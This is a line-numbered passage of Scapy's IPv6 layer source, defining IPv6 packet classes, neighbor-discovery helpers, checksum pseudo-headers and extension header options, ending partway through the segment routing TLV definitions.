1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
6
7# Cool history about this file: http://natisbad.org/scapy/index.html
8
9
10"""
11IPv6 (Internet Protocol v6).
12"""
13
14
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
20
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28 DLT_IPV6,
29 DLT_RAW,
30 DLT_RAW_ALT,
31 ETHER_ANY,
32 ETH_P_ALL,
33 ETH_P_IPV6,
34 MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38 BitEnumField,
39 BitField,
40 ByteEnumField,
41 ByteField,
42 DestIP6Field,
43 FieldLenField,
44 FlagsField,
45 IntField,
46 IP6Field,
47 LongField,
48 MACField,
49 MayEnd,
50 PacketLenField,
51 PacketListField,
52 ShortEnumField,
53 ShortField,
54 SourceIP6Field,
55 StrField,
56 StrFixedLenField,
57 StrLenField,
58 X3BytesField,
59 XBitField,
60 XByteField,
61 XIntField,
62 XShortField,
63)
64from scapy.layers.inet import (
65 _ICMPExtensionField,
66 _ICMPExtensionPadField,
67 _ICMP_extpad_post_dissection,
68 IP,
69 IPTools,
70 TCP,
71 TCPerror,
72 TracerouteResult,
73 UDP,
74 UDPerror,
75)
76from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
77from scapy.packet import bind_layers, Packet, Raw
78from scapy.sendrecv import sendp, sniff, sr, srp1
79from scapy.supersocket import SuperSocket
80from scapy.utils import checksum, strxor
81from scapy.pton_ntop import inet_pton, inet_ntop
82from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
83 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
84 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
85from scapy.volatile import RandInt, RandShort
86
87if not socket.has_ipv6:
88 raise socket.error("can't use AF_INET6, IPv6 is disabled")
89if not hasattr(socket, "IPPROTO_IPV6"):
90 # Workaround for http://bugs.python.org/issue6926
91 socket.IPPROTO_IPV6 = 41
92if not hasattr(socket, "IPPROTO_IPIP"):
93 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
94 socket.IPPROTO_IPIP = 4
95
96if conf.route6 is None:
97 # unused import, only to initialize conf.route6
98 import scapy.route6 # noqa: F401
99
100##########################
101# Neighbor cache stuff #
102##########################
103
104conf.netcache.new_cache("in6_neighbor", 120)
105
106
107@conf.commands.register
108def neighsol(addr, src, iface, timeout=1, chainCC=0):
109 """Sends and receive an ICMPv6 Neighbor Solicitation message
110
111 This function sends an ICMPv6 Neighbor Solicitation message
112 to get the MAC address of the neighbor with specified IPv6 address address.
113
114 'src' address is used as the source IPv6 address of the message. Message
115 is sent on 'iface'. The source MAC address is retrieved accordingly.
116
117 By default, timeout waiting for an answer is 1 second.
118
119 If no answer is gathered, None is returned. Else, the answer is
120 returned (ethernet frame).
121 """
122
123 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
124 d = inet_ntop(socket.AF_INET6, nsma)
125 dm = in6_getnsmac(nsma)
126 sm = get_if_hwaddr(iface)
127 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255)
128 p /= ICMPv6ND_NS(tgt=addr)
129 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm)
130 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
131 chainCC=chainCC)
132
133 return res
134
135
136@conf.commands.register
137def getmacbyip6(ip6, chainCC=0):
138 """Returns the MAC address corresponding to an IPv6 address
139
140 neighborCache.get() method is used on instantiated neighbor cache.
141 Resolution mechanism is described in associated doc string.
142
143 (chainCC parameter value ends up being passed to sending function
144 used to perform the resolution, if needed)
145 """
146
147 if isinstance(ip6, Net6):
148 ip6 = str(ip6)
149
150 if in6_ismaddr(ip6): # Multicast
151 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
152 return mac
153
154 iff, a, nh = conf.route6.route(ip6)
155
156 if iff == conf.loopback_name:
157 return "ff:ff:ff:ff:ff:ff"
158
159 if nh != '::':
160 ip6 = nh # Found next hop
161
162 mac = conf.netcache.in6_neighbor.get(ip6)
163 if mac:
164 return mac
165
166 res = neighsol(ip6, a, iff, chainCC=chainCC)
167
168 if res is not None:
169 if ICMPv6NDOptDstLLAddr in res:
170 mac = res[ICMPv6NDOptDstLLAddr].lladdr
171 else:
172 mac = res.src
173 conf.netcache.in6_neighbor[ip6] = mac
174 return mac
175
176 return None
177
178
179#############################################################################
180#############################################################################
181# IPv6 Class #
182#############################################################################
183#############################################################################
184
185ipv6nh = {0: "Hop-by-Hop Option Header",
186 4: "IP",
187 6: "TCP",
188 17: "UDP",
189 41: "IPv6",
190 43: "Routing Header",
191 44: "Fragment Header",
192 47: "GRE",
193 50: "ESP Header",
194 51: "AH Header",
195 58: "ICMPv6",
196 59: "No Next Header",
197 60: "Destination Option Header",
198 112: "VRRP",
199 132: "SCTP",
200 135: "Mobility Header"}
201
202ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
203 4: "IP",
204 6: "TCP",
205 17: "UDP",
206 43: "IPv6ExtHdrRouting",
207 44: "IPv6ExtHdrFragment",
208 50: "ESP",
209 51: "AH",
210 58: "ICMPv6Unknown",
211 59: "Raw",
212 60: "IPv6ExtHdrDestOpt"}
213
214
215class IP6ListField(StrField):
216 __slots__ = ["count_from", "length_from"]
217 islist = 1
218
219 def __init__(self, name, default, count_from=None, length_from=None):
220 if default is None:
221 default = []
222 StrField.__init__(self, name, default)
223 self.count_from = count_from
224 self.length_from = length_from
225
226 def i2len(self, pkt, i):
227 return 16 * len(i)
228
229 def i2count(self, pkt, i):
230 if isinstance(i, list):
231 return len(i)
232 return 0
233
234 def getfield(self, pkt, s):
235 c = tmp_len = None
236 if self.length_from is not None:
237 tmp_len = self.length_from(pkt)
238 elif self.count_from is not None:
239 c = self.count_from(pkt)
240
241 lst = []
242 ret = b""
243 remain = s
244 if tmp_len is not None:
245 remain, ret = s[:tmp_len], s[tmp_len:]
246 while remain:
247 if c is not None:
248 if c <= 0:
249 break
250 c -= 1
251 addr = inet_ntop(socket.AF_INET6, remain[:16])
252 lst.append(addr)
253 remain = remain[16:]
254 return remain + ret, lst
255
256 def i2m(self, pkt, x):
257 s = b""
258 for y in x:
259 try:
260 y = inet_pton(socket.AF_INET6, y)
261 except Exception:
262 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
263 y = inet_pton(socket.AF_INET6, y)
264 s += y
265 return s
266
267 def i2repr(self, pkt, x):
268 s = []
269 if x is None:
270 return "[]"
271 for y in x:
272 s.append('%s' % y)
273 return "[ %s ]" % (", ".join(s))
274
275
276class _IPv6GuessPayload:
277 name = "Dummy class that implements guess_payload_class() for IPv6"
278
279 def default_payload_class(self, p):
280 if self.nh == 58: # ICMPv6
281 t = orb(p[0])
282 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
283 return _niquery_guesser(p)
284 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501
285 if t == 130 and len(p) >= 28:
286 # RFC 3810 - 8.1. Query Version Distinctions
287 return ICMPv6MLQuery2
288 return icmp6typescls.get(t, Raw)
289 return Raw
290 elif self.nh == 135 and len(p) > 3: # Mobile IPv6
291 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
292 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header
293 return IPv6ExtHdrSegmentRouting
294 return ipv6nhcls.get(self.nh, Raw)
295
296
297class IPv6(_IPv6GuessPayload, Packet, IPTools):
298 name = "IPv6"
299 fields_desc = [BitField("version", 6, 4),
300 BitField("tc", 0, 8),
301 BitField("fl", 0, 20),
302 ShortField("plen", None),
303 ByteEnumField("nh", 59, ipv6nh),
304 ByteField("hlim", 64),
305 SourceIP6Field("src", "dst"), # dst is for src @ selection
306 DestIP6Field("dst", "::1")]
307
308 def route(self):
309 """Used to select the L2 address"""
310 dst = self.dst
311 if isinstance(dst, Gen):
312 dst = next(iter(dst))
313 return conf.route6.route(dst)
314
315 def mysummary(self):
316 return "%s > %s (%i)" % (self.src, self.dst, self.nh)
317
318 def post_build(self, p, pay):
319 p += pay
320 if self.plen is None:
321 tmp_len = len(p) - 40
322 p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
323 return p
324
325 def extract_padding(self, data):
326 """Extract the IPv6 payload"""
327
328 if self.plen == 0 and self.nh == 0 and len(data) >= 8:
329 # Extract Hop-by-Hop extension length
330 hbh_len = orb(data[1])
331 hbh_len = 8 + hbh_len * 8
332
333 # Extract length from the Jumbogram option
334 # Note: the following algorithm take advantage of the Jumbo option
335 # mandatory alignment (4n + 2, RFC2675 Section 2)
336 jumbo_len = None
337 idx = 0
338 offset = 4 * idx + 2
339 while offset <= len(data):
340 opt_type = orb(data[offset])
341 if opt_type == 0xc2: # Jumbo option
342 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501
343 break
344 offset = 4 * idx + 2
345 idx += 1
346
347 if jumbo_len is None:
348 log_runtime.info("Scapy did not find a Jumbo option")
349 jumbo_len = 0
350
351 tmp_len = hbh_len + jumbo_len
352 else:
353 tmp_len = self.plen
354
355 return data[:tmp_len], data[tmp_len:]
356
357 def hashret(self):
358 if self.nh == 58 and isinstance(self.payload, _ICMPv6):
359 if self.payload.type < 128:
360 return self.payload.payload.hashret()
361 elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
362 return struct.pack("B", self.nh) + self.payload.hashret()
363
364 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
365 return self.payload.hashret()
366
367 nh = self.nh
368 sd = self.dst
369 ss = self.src
370 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
371 # With routing header, the destination is the last
372 # address of the IPv6 list if segleft > 0
373 nh = self.payload.nh
374 try:
375 sd = self.addresses[-1]
376 except IndexError:
377 sd = '::1'
378 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501
379 # could be anything from the original list ...
380 if 1:
381 sd = inet_pton(socket.AF_INET6, sd)
382 for a in self.addresses:
383 a = inet_pton(socket.AF_INET6, a)
384 sd = strxor(sd, a)
385 sd = inet_ntop(socket.AF_INET6, sd)
386
387 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
388 # With segment routing header (rh == 4), the destination is
389 # the first address of the IPv6 addresses list
390 try:
391 sd = self.addresses[0]
392 except IndexError:
393 sd = self.dst
394
395 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
396 nh = self.payload.nh
397
398 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
399 nh = self.payload.nh
400
401 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
402 foundhao = None
403 for o in self.payload.options:
404 if isinstance(o, HAO):
405 foundhao = o
406 if foundhao:
407 ss = foundhao.hoa
408 nh = self.payload.nh # XXX what if another extension follows ?
409
410 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
411 sd = inet_pton(socket.AF_INET6, sd)
412 ss = inet_pton(socket.AF_INET6, ss)
413 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501
414 else:
415 return struct.pack("B", nh) + self.payload.hashret()
416
417 def answers(self, other):
418 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
419 if self.nh in [4, 41]:
420 return self.payload.answers(other)
421 if isinstance(other, IPv6) and other.nh in [4, 41]:
422 return self.answers(other.payload)
423 if isinstance(other, IP) and other.proto in [4, 41]:
424 return self.answers(other.payload)
425 if not isinstance(other, IPv6): # self is reply, other is request
426 return False
427 if conf.checkIPaddr:
428 # ss = inet_pton(socket.AF_INET6, self.src)
429 sd = inet_pton(socket.AF_INET6, self.dst)
430 os = inet_pton(socket.AF_INET6, other.src)
431 od = inet_pton(socket.AF_INET6, other.dst)
432 # request was sent to a multicast address (other.dst)
433 # Check reply destination addr matches request source addr (i.e
434 # sd == os) except when reply is multicasted too
435 # XXX test mcast scope matching ?
436 if in6_ismaddr(other.dst):
437 if in6_ismaddr(self.dst):
438 if ((od == sd) or
439 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501
440 return self.payload.answers(other.payload)
441 return False
442 if (os == sd):
443 return self.payload.answers(other.payload)
444 return False
445 elif (sd != os): # or ss != od): <- removed for ICMP errors
446 return False
447 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501
448 # ICMPv6 Error message -> generated by IPv6 packet
449 # Note : at the moment, we jump the ICMPv6 specific class
450 # to call answers() method of erroneous packet (over
451 # initial packet). There can be cases where an ICMPv6 error
452 # class could implement a specific answers method that perform
453 # a specific task. Currently, don't see any use ...
454 return self.payload.payload.answers(other)
455 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
456 return self.payload.answers(other.payload)
457 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
458 return self.payload.answers(other.payload.payload)
459 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
460 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
461 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
462 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
463 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
464 return self.payload.answers(other.payload.payload)
465 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501
466 return self.payload.payload.answers(other.payload)
467 else:
468 if (self.nh != other.nh):
469 return False
470 return self.payload.answers(other.payload)
471
472
473class IPv46(IP):
474 """
475 This class implements a dispatcher that is used to detect the IP version
476 while parsing Raw IP pcap files.
477 """
478 @classmethod
479 def dispatch_hook(cls, _pkt=None, *_, **kargs):
480 if _pkt:
481 if orb(_pkt[0]) >> 4 == 6:
482 return IPv6
483 elif kargs.get("version") == 6:
484 return IPv6
485 return IP
486
487
488def inet6_register_l3(l2, l3):
489 """
490 Resolves the default L2 destination address when IPv6 is used.
491 """
492 return getmacbyip6(l3.dst)
493
494
495conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
496
497
498class IPerror6(IPv6):
499 name = "IPv6 in ICMPv6"
500
501 def answers(self, other):
502 if not isinstance(other, IPv6):
503 return False
504 sd = inet_pton(socket.AF_INET6, self.dst)
505 ss = inet_pton(socket.AF_INET6, self.src)
506 od = inet_pton(socket.AF_INET6, other.dst)
507 os = inet_pton(socket.AF_INET6, other.src)
508
509 # Make sure that the ICMPv6 error is related to the packet scapy sent
510 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
511
512 # find upper layer for self (possible citation)
513 selfup = self.payload
514 while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
515 selfup = selfup.payload
516
517 # find upper layer for other (initial packet). Also look for RH
518 otherup = other.payload
519 request_has_rh = False
520 while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
521 if isinstance(otherup, IPv6ExtHdrRouting):
522 request_has_rh = True
523 otherup = otherup.payload
524
525 if ((ss == os and sd == od) or # < Basic case
526 (ss == os and request_has_rh)):
527 # ^ Request has a RH : don't check dst address
528
529 # Let's deal with possible MSS Clamping
530 if (isinstance(selfup, TCP) and
531 isinstance(otherup, TCP) and
532 selfup.options != otherup.options): # seems clamped
533
534 # Save fields modified by MSS clamping
535 old_otherup_opts = otherup.options
536 old_otherup_cksum = otherup.chksum
537 old_otherup_dataofs = otherup.dataofs
538 old_selfup_opts = selfup.options
539 old_selfup_cksum = selfup.chksum
540 old_selfup_dataofs = selfup.dataofs
541
542 # Nullify them
543 otherup.options = []
544 otherup.chksum = 0
545 otherup.dataofs = 0
546 selfup.options = []
547 selfup.chksum = 0
548 selfup.dataofs = 0
549
550 # Test it and save result
551 s1 = raw(selfup)
552 s2 = raw(otherup)
553 tmp_len = min(len(s1), len(s2))
554 res = s1[:tmp_len] == s2[:tmp_len]
555
556 # recall saved values
557 otherup.options = old_otherup_opts
558 otherup.chksum = old_otherup_cksum
559 otherup.dataofs = old_otherup_dataofs
560 selfup.options = old_selfup_opts
561 selfup.chksum = old_selfup_cksum
562 selfup.dataofs = old_selfup_dataofs
563
564 return res
565
566 s1 = raw(selfup)
567 s2 = raw(otherup)
568 tmp_len = min(len(s1), len(s2))
569 return s1[:tmp_len] == s2[:tmp_len]
570
571 return False
572
573 def mysummary(self):
574 return Packet.mysummary(self)
575
576
577#############################################################################
578#############################################################################
579# Upper Layer Checksum computation #
580#############################################################################
581#############################################################################
582
583class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
584 name = "Pseudo IPv6 Header"
585 fields_desc = [IP6Field("src", "::"),
586 IP6Field("dst", "::"),
587 IntField("uplen", None),
588 BitField("zero", 0, 24),
589 ByteField("nh", 0)]
590
591
592def in6_pseudoheader(nh, u, plen):
593 # type: (int, IP, int) -> PseudoIPv6
594 """
595 Build an PseudoIPv6 instance as specified in RFC 2460 8.1
596
597 This function operates by filling a pseudo header class instance
598 (PseudoIPv6) with:
599 - Next Header value
600 - the address of _final_ destination (if some Routing Header with non
601 segleft field is present in underlayer classes, last address is used.)
602 - the address of _real_ source (basically the source address of an
603 IPv6 class instance available in the underlayer or the source address
604 in HAO option if some Destination Option header found in underlayer
605 includes this option).
606 - the length is the length of provided payload string ('p')
607
608 :param nh: value of upper layer protocol
609 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
610 provided with all under layers (IPv6 and all extension headers,
611 for example)
612 :param plen: the length of the upper layer and payload
613 """
614 ph6 = PseudoIPv6()
615 ph6.nh = nh
616 rthdr = 0
617 hahdr = 0
618 final_dest_addr_found = 0
619 while u is not None and not isinstance(u, IPv6):
620 if (isinstance(u, IPv6ExtHdrRouting) and
621 u.segleft != 0 and len(u.addresses) != 0 and
622 final_dest_addr_found == 0):
623 rthdr = u.addresses[-1]
624 final_dest_addr_found = 1
625 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
626 u.segleft != 0 and len(u.addresses) != 0 and
627 final_dest_addr_found == 0):
628 rthdr = u.addresses[0]
629 final_dest_addr_found = 1
630 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
631 isinstance(u.options[0], HAO)):
632 hahdr = u.options[0].hoa
633 u = u.underlayer
634 if u is None:
635 warning("No IPv6 underlayer to compute checksum. Leaving null.")
636 return None
637 if hahdr:
638 ph6.src = hahdr
639 else:
640 ph6.src = u.src
641 if rthdr:
642 ph6.dst = rthdr
643 else:
644 ph6.dst = u.dst
645 ph6.uplen = plen
646 return ph6
647
648
649def in6_chksum(nh, u, p):
650 """
651 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
652
653 See also `.in6_pseudoheader`
654
655 :param nh: value of upper layer protocol
656 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
657 provided with all under layers (IPv6 and all extension headers,
658 for example)
659 :param p: the payload of the upper layer provided as a string
660 """
661 ph6 = in6_pseudoheader(nh, u, len(p))
662 if ph6 is None:
663 return 0
664 ph6s = raw(ph6)
665 return checksum(ph6s + p)
666
667
668#############################################################################
669#############################################################################
670# Extension Headers #
671#############################################################################
672#############################################################################
673
674
675# Inherited by all extension header classes
676class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
677 name = 'Abstract IPv6 Option Header'
678 aliastypes = [IPv6, IPerror6] # TODO ...
679
680
681# IPv6 options for Extension Headers #
682
683_hbhopts = {0x00: "Pad1",
684 0x01: "PadN",
685 0x04: "Tunnel Encapsulation Limit",
686 0x05: "Router Alert",
687 0x06: "Quick-Start",
688 0xc2: "Jumbo Payload",
689 0xc9: "Home Address Option"}
690
691
692class _OTypeField(ByteEnumField):
693 """
694 Modified BytEnumField that displays information regarding the IPv6 option
695 based on its option type value (What should be done by nodes that process
696 the option if they do not understand it ...)
697
698 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
699 """
700 pol = {0x00: "00: skip",
701 0x40: "01: discard",
702 0x80: "10: discard+ICMP",
703 0xC0: "11: discard+ICMP not mcast"}
704
705 enroutechange = {0x00: "0: Don't change en-route",
706 0x20: "1: May change en-route"}
707
708 def i2repr(self, pkt, x):
709 s = self.i2s.get(x, repr(x))
710 polstr = self.pol[(x & 0xC0)]
711 enroutechangestr = self.enroutechange[(x & 0x20)]
712 return "%s [%s, %s]" % (s, polstr, enroutechangestr)
713
714
715class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
716 name = "Scapy6 Unknown Option"
717 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
718 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
719 StrLenField("optdata", "",
720 length_from=lambda pkt: pkt.optlen)]
721
722 def alignment_delta(self, curpos): # By default, no alignment requirement
723 """
724 As specified in section 4.2 of RFC 2460, every options has
725 an alignment requirement usually expressed xn+y, meaning
726 the Option Type must appear at an integer multiple of x octets
727 from the start of the header, plus y octets.
728
729 That function is provided the current position from the
730 start of the header and returns required padding length.
731 """
732 return 0
733
734 @classmethod
735 def dispatch_hook(cls, _pkt=None, *args, **kargs):
736 if _pkt:
737 o = orb(_pkt[0]) # Option type
738 if o in _hbhoptcls:
739 return _hbhoptcls[o]
740 return cls
741
742 def extract_padding(self, p):
743 return b"", p
744
745
746class Pad1(Packet): # IPv6 Hop-By-Hop Option
747 name = "Pad1"
748 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
749
750 def alignment_delta(self, curpos): # No alignment requirement
751 return 0
752
753 def extract_padding(self, p):
754 return b"", p
755
756
757class PadN(Packet): # IPv6 Hop-By-Hop Option
758 name = "PadN"
759 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
760 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
761 StrLenField("optdata", "",
762 length_from=lambda pkt: pkt.optlen)]
763
764 def alignment_delta(self, curpos): # No alignment requirement
765 return 0
766
767 def extract_padding(self, p):
768 return b"", p
769
770
771class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
772 name = "Router Alert"
773 fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
774 ByteField("optlen", 2),
775 ShortEnumField("value", None,
776 {0: "Datagram contains a MLD message",
777 1: "Datagram contains RSVP message",
778 2: "Datagram contains an Active Network message", # noqa: E501
779 68: "NSIS NATFW NSLP",
780 69: "MPLS OAM",
781 65535: "Reserved"})]
782 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501
783 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501
784 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501
785 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
786
787 def alignment_delta(self, curpos): # alignment requirement : 2n+0
788 x = 2
789 y = 0
790 delta = x * ((curpos - y + x - 1) // x) + y - curpos
791 return delta
792
793 def extract_padding(self, p):
794 return b"", p
795
796
797class RplOption(Packet): # RFC 6553 - RPL Option
798 name = "RPL Option"
799 fields_desc = [_OTypeField("otype", 0x63, _hbhopts),
800 ByteField("optlen", 4),
801 BitField("Down", 0, 1),
802 BitField("RankError", 0, 1),
803 BitField("ForwardError", 0, 1),
804 BitField("unused", 0, 5),
805 XByteField("RplInstanceId", 0),
806 XShortField("SenderRank", 0)]
807
808 def alignment_delta(self, curpos): # alignment requirement : 2n+0
809 x = 2
810 y = 0
811 delta = x * ((curpos - y + x - 1) // x) + y - curpos
812 return delta
813
814 def extract_padding(self, p):
815 return b"", p
816
817
818class Jumbo(Packet): # IPv6 Hop-By-Hop Option
819 name = "Jumbo Payload"
820 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
821 ByteField("optlen", 4),
822 IntField("jumboplen", None)]
823
824 def alignment_delta(self, curpos): # alignment requirement : 4n+2
825 x = 4
826 y = 2
827 delta = x * ((curpos - y + x - 1) // x) + y - curpos
828 return delta
829
830 def extract_padding(self, p):
831 return b"", p
832
833
834class HAO(Packet): # IPv6 Destination Options Header Option
835 name = "Home Address Option"
836 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
837 ByteField("optlen", 16),
838 IP6Field("hoa", "::")]
839
840 def alignment_delta(self, curpos): # alignment requirement : 8n+6
841 x = 8
842 y = 6
843 delta = x * ((curpos - y + x - 1) // x) + y - curpos
844 return delta
845
846 def extract_padding(self, p):
847 return b"", p
848
849
850_hbhoptcls = {0x00: Pad1,
851 0x01: PadN,
852 0x05: RouterAlert,
853 0x63: RplOption,
854 0xC2: Jumbo,
855 0xC9: HAO}
856
857
858# Hop-by-Hop Extension Header #
859
860class _OptionsField(PacketListField):
861 __slots__ = ["curpos"]
862
863 def __init__(self, name, default, cls, curpos, *args, **kargs):
864 self.curpos = curpos
865 PacketListField.__init__(self, name, default, cls, *args, **kargs)
866
867 def i2len(self, pkt, i):
868 return len(self.i2m(pkt, i))
869
870 def i2m(self, pkt, x):
871 autopad = None
872 try:
873 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
874 except Exception:
875 autopad = 1
876
877 if not autopad:
878 return b"".join(map(bytes, x))
879
880 curpos = self.curpos
881 s = b""
882 for p in x:
883 d = p.alignment_delta(curpos)
884 curpos += d
885 if d == 1:
886 s += raw(Pad1())
887 elif d != 0:
888 s += raw(PadN(optdata=b'\x00' * (d - 2)))
889 pstr = raw(p)
890 curpos += len(pstr)
891 s += pstr
892
893 # Let's make the class including our option field
894 # a multiple of 8 octets long
895 d = curpos % 8
896 if d == 0:
897 return s
898 d = 8 - d
899 if d == 1:
900 s += raw(Pad1())
901 elif d != 0:
902 s += raw(PadN(optdata=b'\x00' * (d - 2)))
903
904 return s
905
906 def addfield(self, pkt, s, val):
907 return s + self.i2m(pkt, val)
908
909
910class _PhantomAutoPadField(ByteField):
911 def addfield(self, pkt, s, val):
912 return s
913
914 def getfield(self, pkt, s):
915 return s, 1
916
917 def i2repr(self, pkt, x):
918 if x:
919 return "On"
920 return "Off"
921
922
923class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
924 name = "IPv6 Extension Header - Hop-by-Hop Options Header"
925 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
926 FieldLenField("len", None, length_of="options", fmt="B",
927 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
928 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
929 _OptionsField("options", [], HBHOptUnknown, 2,
930 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
931 overload_fields = {IPv6: {"nh": 0}}
932
933
934# Destination Option Header #
935
936class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
937 name = "IPv6 Extension Header - Destination Options Header"
938 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
939 FieldLenField("len", None, length_of="options", fmt="B",
940 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
941 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
942 _OptionsField("options", [], HBHOptUnknown, 2,
943 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
944 overload_fields = {IPv6: {"nh": 60}}
945
946
947# Routing Header #
948
949class IPv6ExtHdrRouting(_IPv6ExtHdr):
950 name = "IPv6 Option Header Routing"
951 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
952 FieldLenField("len", None, count_of="addresses", fmt="B",
953 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501
954 ByteField("type", 0),
955 ByteField("segleft", None),
956 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501
957 IP6ListField("addresses", [],
958 length_from=lambda pkt: 8 * pkt.len)]
959 overload_fields = {IPv6: {"nh": 43}}
960
961 def post_build(self, pkt, pay):
962 if self.segleft is None:
963 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
964 return _IPv6ExtHdr.post_build(self, pkt, pay)
965
966
967# Segment Routing Header #
968
969# This implementation is based on RFC8754, but some older snippets come from:
970# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
971
972_segment_routing_header_tlvs = {
973 # RFC 8754 sect 8.2
974 0: "Pad1 TLV",
975 1: "Ingress Node TLV", # draft 06
976 2: "Egress Node TLV", # draft 06
977 4: "PadN TLV",
978 5: "HMAC TLV",
979}
980
981
982class IPv6ExtHdrSegmentRoutingTLV(Packet):
983 name = "IPv6 Option Header Segment Routing - Generic TLV"
984 # RFC 8754 sect 2.1
985 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
986 ByteField("len", 0),
987 StrLenField("value", "", length_from=lambda pkt: pkt.len)]
988
989 def extract_padding(self, p):
990 return b"", p
991
992 registered_sr_tlv = {}
993
994 @classmethod
995 def register_variant(cls):
996 cls.registered_sr_tlv[cls.type.default] = cls
997
998 @classmethod
999 def dispatch_hook(cls, pkt=None, *args, **kargs):
1000 if pkt:
1001 tmp_type = ord(pkt[:1])
1002 return cls.registered_sr_tlv.get(tmp_type, cls)
1003 return cls
1004
1005
1006class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
1007 name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
